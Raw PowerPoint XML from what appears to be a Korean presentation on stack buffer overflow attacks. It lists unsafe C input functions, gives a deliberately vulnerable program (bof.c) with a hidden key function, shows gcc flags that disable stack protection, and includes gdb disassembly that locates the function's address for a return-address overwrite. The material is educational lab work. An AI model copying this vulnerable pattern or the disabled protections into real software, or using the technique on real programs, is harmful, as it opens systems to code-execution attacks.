            <a:off x="8007393" y="2251808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0869B5-AC22-4064-9C3F-B4DD1716CBD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="2080981"/>
            <a:ext cx="228601" cy="2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4A01AA-AF8F-4236-9C8D-BC2638FBF8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197204" y="2339850"/>
            <a:ext cx="17700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다른 코드의 주소</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37310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3" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="3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03AC24E1-B163-4614-869D-3806398B6D06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="31486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ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>언어의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>취약 함수</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" spc="-148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EA5AED-2D33-449C-BDE1-0343C9D8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01220"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1065284" y="1264688"/>
          <a:ext cx="10061431" cy="51240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5323">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3492673941"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6276108">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="373239128"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="396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30185"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1564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scanf(const char *format, ...)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엔터가 입력될 때 까지 입력을 받는다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공백이</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>없다면 버퍼의 사이즈를 고려하지 않고 입력을</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>보두 받아들이기 때문에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>BOF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>가 발생할 수</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>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5891"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1271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strcpy(char *dest, const char *src)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dest </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>scr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>을 복사하는 함수이다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버퍼의</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>크기를 고려하지 않아서 스택 내부에</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>공격코드를 삽입할 수 있고 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>BOF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>가 발생할 수</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>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41031"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97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gets(char *s)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버퍼의 사이즈를 전혀 고려하지 않고 입력을</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>모두 받아들인다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따라서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>BOF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>가 발생할 수</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>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1135"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="396522"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/>
                        <a:t>strcat(char *dest, const char *src)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src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>의 내용을 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>dest </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>끝에 붙인다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버퍼의</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>사이즈를 고려하지 않으므로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>BOF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>가 발생할 수</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>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9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23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220977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800" spc="-144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BOF </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="-144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공격 실습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31726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디버깅을 위한 리눅스 사용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3280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프로세스 분석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21723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공격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41405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3537505-0422-4FFC-9EBD-F411325ADE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535926" y="429547"/>
            <a:ext cx="5120148" cy="59989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 &lt;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stdio.h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 &lt;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string.h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endParaRPr lang="en-US" altLang="ko-KR" sz="2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 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printKey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("key : du^82i!&lt;\n");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endParaRPr lang="en-US" altLang="ko-KR" sz="2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 main()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char S[10];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char Password[10] = "!1234his";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scanf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("%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s",S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If(!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strcmp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S,Password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))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printKey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else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("Wrong!!\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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A608B-AA24-4EE8-961A-4CFDBBCE7966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5615131" y="6428453"/>
            <a:ext cx="96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 err="1"/>
              <a:t>bof.c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1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32355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디버깅을 위한 리눅스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DB8871-07E5-4B63-B84E-FED73FC55C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848180" y="1799973"/>
            <a:ext cx="8495639" cy="29932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gcc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–o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bof.c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A94ED-DB88-4C64-BB18-61F5DC91B85C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651819" y="2848135"/>
            <a:ext cx="354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en-US" altLang="ko-KR" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-stack-protector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64470-863B-420F-B4EA-847A066E7CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651820" y="3721792"/>
            <a:ext cx="35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en-US" altLang="ko-KR" err="1"/>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-stack-boundary=2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483799-9FC7-4FEE-A1FF-D5647A8146F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63563" y="3032801"/>
            <a:ext cx="688256" cy="43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D8BA46-74C3-4AEB-A58E-972BD84F757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63564" y="3468472"/>
            <a:ext cx="688256" cy="43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31B674-9227-4083-9311-B872EC724E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5201266" y="2848135"/>
            <a:ext cx="0" cy="1242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95B546-32A4-4DC1-B8A4-4B8825015A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5407742" y="2848135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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 스택 보호 기법 해제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63CAE-6DCD-4F7C-ACC0-ECD9A6590DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5407741" y="3721792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스택의 데이터 사이의 더미</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>빈 공간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>생성 해제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683EE9-2344-4768-9301-69C58FE8E50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848180" y="5563957"/>
            <a:ext cx="8495639" cy="29932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gcc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fno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-stack-protector -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mpreferred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-stack-boundary=2 -o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bof.c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08CC954-50A8-4FF5-B1BC-E5638216B6BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5642981" y="4663655"/>
            <a:ext cx="906036" cy="352615"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59280"/>
              <a:gd name="adj2" fmla="val 4536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6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/>
      <p:bldP spid="22" grpId="0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18119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프로세스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56AAB-82DA-4A96-9C61-28FCFB169551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848180" y="1131380"/>
            <a:ext cx="8495639" cy="541690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his@his-VirtualBox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:~/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바탕화면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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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gdb</a:t>
            </a:r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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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GNU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gdb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(Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1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 (C) 2016 Free Software Foundation, Inc.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License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;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is free software: you are free to change and redistribute it.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There is NO WARRANTY, to the extent permitted by law. Type "show copying"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 "show warranty" for details.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GDB was configured as "i686-linux-gnu".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 "show configuration" for configuration details.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bug reporting instructions, please see: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&lt;http://www.gnu.org/software/gdb/bugs/&gt;.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Find the GDB manual and other documentation resources online at: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&lt;http://www.gnu.org/software/gdb/documentation/&gt;.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help, type "help".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 "apropos word" to search for commands related to "word"...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Reading symbols from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...(no debugging symbols found)...done.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gdb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Quit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gdb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61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4DCE5-C769-42A1-A200-5C3DBC5C45CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762001" y="2723746"/>
            <a:ext cx="3095624" cy="1724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이론적 배경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0797E9-9FBA-430A-8872-83B641DD9E73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548188" y="2723746"/>
            <a:ext cx="3095624" cy="1724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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격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BA3992-D606-4295-927E-0E4880AF5ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8334375" y="2723746"/>
            <a:ext cx="3095624" cy="1724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대처 방안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3878A35-CA57-446B-BD97-3D32BAD4900C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3941015" y="3467019"/>
            <a:ext cx="523783" cy="2374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7C20D7C-315E-481A-8A07-670D6DE63743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727202" y="3467019"/>
            <a:ext cx="523783" cy="2374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067102-80C9-403C-AEE8-FEFB3A59A171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="12888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발표 순서</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6038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3A36D10E-88E9-4EE1-ABF4-C73ADBE97F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="18119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프로세스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DD5EB6-2B06-486A-BC18-198FD3A64962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3878683" y="888280"/>
            <a:ext cx="4434633" cy="585664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gdb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disas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main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Dump of assembler code for function main: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0x0804849e &lt;+0&gt;: push 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0x0804849f &lt;+1&gt;: mov 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0x080484a1 &lt;+3&gt;: sub $0x14,%esp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0x080484a4 &lt;+6&gt;: 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movl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$0x33323121,-0x14(%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0x080484ab &lt;+13&gt;: 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movl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$0x73696834,-0x10(%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0x080484b2 &lt;+20&gt;: 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movw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$0x0,-0xc(%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0x080484b8 &lt;+26&gt;: lea -0xa(%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0x080484bb &lt;+29&gt;: push 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0x080484bc &lt;+30&gt;: push $0x804858f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0x080484c1 &lt;+35&gt;: call 0x8048370 &lt;__isoc99_scanf@plt&gt;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0x080484c6 &lt;+40&gt;: add $0x8,%esp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0x080484c9 &lt;+43&gt;: lea -0x14(%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0x080484cc &lt;+46&gt;: push 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0x080484cd &lt;+47&gt;: lea -0xa(%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0x080484d0 &lt;+50&gt;: push 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0x080484d1 &lt;+51&gt;: call 0x8048340 &lt;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strcmp@plt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0x080484d6 &lt;+56&gt;: add $0x8,%esp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0x080484d9 &lt;+59&gt;: test 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,%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0x080484db &lt;+61&gt;: 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jne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0x80484e4 &lt;main+70&gt;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0x080484dd &lt;+63&gt;: call 0x804848b &lt;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printKey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0x080484e2 &lt;+68&gt;: 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jmp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0x80484f1 &lt;main+83&gt;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0x080484e4 &lt;+70&gt;: push $0x8048592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0x080484e9 &lt;+75&gt;: call 0x8048350 &lt;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puts@plt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0x080484ee &lt;+80&gt;: add $0x4,%esp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0x080484f1 &lt;+83&gt;: mov $0x0,%eax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0x080484f6 &lt;+88&gt;: leave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0x080484f7 &lt;+89&gt;: ret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 of assembler dump.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gdb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89F74C-DA70-40D8-BE38-50EBF0148BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3963404" y="3171825"/>
            <a:ext cx="424614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04D54-0F64-4445-A750-324E54F98E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3963404" y="5000625"/>
            <a:ext cx="424614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262EFDE-25A2-467D-B337-5D2634AD9E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="8398037" y="4898183"/>
            <a:ext cx="476250" cy="204883"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59280"/>
              <a:gd name="adj2" fmla="val 4536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D9174F-4036-4EA0-ABA4-6ECAC108763D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="8398037" y="3069383"/>
            <a:ext cx="476250" cy="204883"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59280"/>
              <a:gd name="adj2" fmla="val 4536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D810C-2B34-4B12-A106-52AA34A66493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8959008" y="4677459"/>
            <a:ext cx="175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printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: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0x0804848b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68887-C0FF-41A5-A326-A979CC1132F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8959008" y="298715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scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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3015369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3A36D10E-88E9-4EE1-ABF4-C73ADBE97F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="18119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프로세스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DD5EB6-2B06-486A-BC18-198FD3A64962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267440" y="2025446"/>
            <a:ext cx="6477492" cy="337246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0x0804849e &lt;+0&gt;: push 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0x0804849f &lt;+1&gt;: mov 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0x080484a1 &lt;+3&gt;: sub $0x14,%esp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0x080484a4 &lt;+6&gt;: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movl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$0x33323121,-0x14(%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0x080484ab &lt;+13&gt;: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movl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$0x73696834,-0x10(%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0x080484b2 &lt;+20&gt;: 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movw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$0x0,-0xc(%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0x080484b8 &lt;+26&gt;: lea -0xa(%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0x080484bb &lt;+29&gt;: push %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0x080484bc &lt;+30&gt;: push $0x804858f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0x080484c1 &lt;+35&gt;: call 0x8048370 &lt;__isoc99_scanf@plt&gt;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0x080484c6 …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46DD4-7551-43C5-A38B-8C908EFEEFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="1167487"/>
            <a:ext cx="2414726" cy="558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77DC88-BD3C-44A7-93D4-7DCDB488B3A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8648700" y="6670584"/>
            <a:ext cx="2575340" cy="14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5660E-382E-4CD6-9557-211768C72D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="1167487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38B2D56-F5C4-4C4A-A941-3123FCD44985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11224040" y="859564"/>
            <a:ext cx="860963" cy="61584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AE6BC3-6EC5-44F4-BEB6-E5290638CDC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="4006119"/>
            <a:ext cx="2414726" cy="65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0x080484c6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FF5752-DF50-4261-A344-C2592A8F0CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="4662143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EE9734B-5DA2-4F7F-95F9-60F93C90D906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6872748" y="1289871"/>
            <a:ext cx="1836595" cy="4227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Main()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 point</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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0E399E6-CDED-4EF3-8EE2-E69D57C9C940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6794092" y="4748466"/>
            <a:ext cx="1915251" cy="4227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scanf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 point</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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8704C-FDD8-444A-96C9-C950AD24CE96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="4977522"/>
            <a:ext cx="2414726" cy="140493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버퍼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D912E8-8F8B-46EC-8D27-7D4A014B6EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962650" y="3143250"/>
            <a:ext cx="2746693" cy="21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6A3F53-12B7-47D4-BB89-20C10CAE42BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6096000" y="3105884"/>
            <a:ext cx="2613343" cy="317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9C1072-C3D4-445A-9842-305BB5CD7F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5200650" y="2816677"/>
            <a:ext cx="3508693" cy="86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616B84B-2CE2-4D69-8025-E27684030579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2924175" y="4105275"/>
            <a:ext cx="11620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83E4B8B6-F0C4-4662-B442-0198D5E9662E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3724275" y="2579610"/>
            <a:ext cx="4985068" cy="1525667"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8038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F6098-23E2-4A15-A5A8-5FFE67AB6BCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="2588124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E02B19-138D-420B-81F1-66848FA02803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="2854371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D12C3A-9A32-4563-B9FF-561E570DD769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="3120792"/>
            <a:ext cx="2414726" cy="232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8373D8-2E9A-4A21-8808-51D3884E488E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="3365384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주소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17CB0A-BB2C-447A-997F-091CEFE827E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729007" y="3689355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“%s”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AA8F68-3A09-4C8F-B3D7-E8EBF86C1B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2262557" y="5721059"/>
            <a:ext cx="2485285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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
